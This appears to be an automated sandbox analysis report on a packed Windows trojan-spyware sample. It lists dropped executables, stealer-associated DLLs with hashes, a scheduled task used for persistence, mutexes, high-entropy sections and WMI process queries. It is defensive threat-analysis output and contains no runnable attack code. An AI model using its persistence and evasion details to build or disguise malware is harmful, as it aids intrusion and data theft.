Source: 5e28f62265.exe, 0000000E.00000000.2797533174.00000000009B2000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer		memstr_40c7b221-1

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr	Static PE information: section name:
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr	Static PE information: section name: .idata
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name:
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name: .idata
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name:
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name:
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name: .rsrc
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name: .idata
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name:
Source: skotes.exe.4.dr	Static PE information: section name:
Source: skotes.exe.4.dr	Static PE information: section name: .idata
Source: skotes.exe.4.dr	Static PE information: section name:
Source: random[1].exe.7.dr	Static PE information: section name:
Source: random[1].exe.7.dr	Static PE information: section name: .rsrc
Source: random[1].exe.7.dr	Static PE information: section name: .idata
Source: e192e43b61.exe.7.dr	Static PE information: section name:
Source: e192e43b61.exe.7.dr	Static PE information: section name: .rsrc
Source: e192e43b61.exe.7.dr	Static PE information: section name: .idata
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.7.dr	Static PE information: section name: .idata
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: b0b9f39429.exe.7.dr	Static PE information: section name:
Source: b0b9f39429.exe.7.dr	Static PE information: section name: .rsrc
Source: b0b9f39429.exe.7.dr	Static PE information: section name: .idata
Source: b0b9f39429.exe.7.dr	Static PE information: section name:
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name:
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name: .idata
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name:
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name:
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name: .rsrc
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name: .idata
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name:

PE file has a writeable .text section

Source: num[1].exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C7362C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,

6_2_6C7362C0

Creates files inside the system directory

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5BAC60	6_2_6C5BAC60
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C68AC30	6_2_6C68AC30
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C676C00	6_2_6C676C00
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5AECC0	6_2_6C5AECC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C60ECD0	6_2_6C60ECD0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C67ED70	6_2_6C67ED70
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6DAD50	6_2_6C6DAD50
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C738D20	6_2_6C738D20
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C73CDC0	6_2_6C73CDC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5B4DB0	6_2_6C5B4DB0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C646D90	6_2_6C646D90
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C64EE70	6_2_6C64EE70
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C690E20	6_2_6C690E20
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5BAEC0	6_2_6C5BAEC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C650EC0	6_2_6C650EC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C636E90	6_2_6C636E90
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C672F70	6_2_6C672F70
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C61EF40	6_2_6C61EF40
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5B6F10	6_2_6C5B6F10
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6F0F20	6_2_6C6F0F20
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C68EFF0	6_2_6C68EFF0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5B0FE0	6_2_6C5B0FE0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6F8FB0	6_2_6C6F8FB0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5BEFB0	6_2_6C5BEFB0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C684840	6_2_6C684840
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C600820	6_2_6C600820
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C63A820	6_2_6C63A820
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6B68E0	6_2_6C6B68E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5E8960	6_2_6C5E8960
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C606900	6_2_6C606900
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6CC9E0	6_2_6C6CC9E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5E49F0	6_2_6C5E49F0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6409A0	6_2_6C6409A0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C66A9A0	6_2_6C66A9A0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6709B0	6_2_6C6709B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C62CA70	6_2_6C62CA70
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C668A30	6_2_6C668A30
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C65EA00	6_2_6C65EA00
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C62EA80	6_2_6C62EA80
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6B6BE0	6_2_6C6B6BE0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C650BA0	6_2_6C650BA0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5C8460	6_2_6C5C8460
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C614420	6_2_6C614420
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C63A430	6_2_6C63A430
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5F64D0	6_2_6C5F64D0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C64A4D0	6_2_6C64A4D0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6DA480	6_2_6C6DA480
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C612560	6_2_6C612560
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C650570	6_2_6C650570
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C608540	6_2_6C608540
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6B4540	6_2_6C6B4540
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6F8550	6_2_6C6F8550
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C67A5E0	6_2_6C67A5E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C63E5F0	6_2_6C63E5F0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5A45B0	6_2_6C5A45B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C60C650	6_2_6C60C650
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C60E6E0	6_2_6C60E6E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C64E6E0	6_2_6C64E6E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5D46D0	6_2_6C5D46D0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C630700	6_2_6C630700
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5DA7D0	6_2_6C5DA7D0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5FE070	6_2_6C5FE070
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C67C000	6_2_6C67C000
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C678010	6_2_6C678010
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5A8090	6_2_6C5A8090
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C68C0B0	6_2_6C68C0B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5C00B0	6_2_6C5C00B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C618140	6_2_6C618140
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C626130	6_2_6C626130
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C694130	6_2_6C694130
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5B01E0	6_2_6C5B01E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C638260	6_2_6C638260
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C648250	6_2_6C648250
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C688220	6_2_6C688220
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C67A210	6_2_6C67A210
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C7362C0	6_2_6C7362C0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6822A0	6_2_6C6822A0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C67E2B0	6_2_6C67E2B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6CC360	6_2_6C6CC360
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C646370	6_2_6C646370
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5B8340	6_2_6C5B8340
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6F2370	6_2_6C6F2370
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5B2370	6_2_6C5B2370
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C622320	6_2_6C622320
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6043E0	6_2_6C6043E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C60E3B0	6_2_6C60E3B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5E23A0	6_2_6C5E23A0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5B3C40	6_2_6C5B3C40
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6D9C40	6_2_6C6D9C40
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5C1C30	6_2_6C5C1C30
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C671CE0	6_2_6C671CE0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6EDCD0	6_2_6C6EDCD0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C613D00	6_2_6C613D00
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C681DC0	6_2_6C681DC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5A3D80	6_2_6C5A3D80
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6F9D90	6_2_6C6F9D90
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C70BE70	6_2_6C70BE70
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C735E60	6_2_6C735E60
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6BDE10	6_2_6C6BDE10
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5D3EC0	6_2_6C5D3EC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C707F20	6_2_6C707F20
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5A5F30	6_2_6C5A5F30
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5E5F20	6_2_6C5E5F20
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C65BFF0	6_2_6C65BFF0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6CDFC0	6_2_6C6CDFC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C733FC0	6_2_6C733FC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5D1F90	6_2_6C5D1F90
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C60D810	6_2_6C60D810
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C70B8F0	6_2_6C70B8F0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C68F8F0	6_2_6C68F8F0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5BD8E0	6_2_6C5BD8E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5E38E0	6_2_6C5E38E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C62F960	6_2_6C62F960
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C66D960	6_2_6C66D960
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C665920	6_2_6C665920

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: String function: 6C5D3620 appears 74 times
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: String function: 6C5D9B10 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: String function: 6C6E9F30 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: String function: 6C60C5E0 appears 35 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.998114224137931
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: Section: ZLIB complexity 0.998446014986376
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: Section: ujtayirb ZLIB complexity 0.994414299962006
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: Section: rhebxyzr ZLIB complexity 0.9951511497101891
Source: skotes.exe.4.dr	Static PE information: Section: ZLIB complexity 0.998446014986376
Source: skotes.exe.4.dr	Static PE information: Section: ujtayirb ZLIB complexity 0.994414299962006
Source: random[1].exe.7.dr	Static PE information: Section: ZLIB complexity 0.998114224137931
Source: e192e43b61.exe.7.dr	Static PE information: Section: ZLIB complexity 0.998114224137931
Source: random[1].exe0.7.dr	Static PE information: Section: rhebxyzr ZLIB complexity 0.9951511497101891
Source: b0b9f39429.exe.7.dr	Static PE information: Section: rhebxyzr ZLIB complexity 0.9951511497101891
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: Section: ZLIB complexity 0.998446014986376
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: Section: ujtayirb ZLIB complexity 0.994414299962006
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: Section: rhebxyzr ZLIB complexity 0.9951511497101891

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@51/42@7/7

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C610300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

6_2_6C610300

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OEHXUQRB.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2140:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:368:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4008:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:708:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

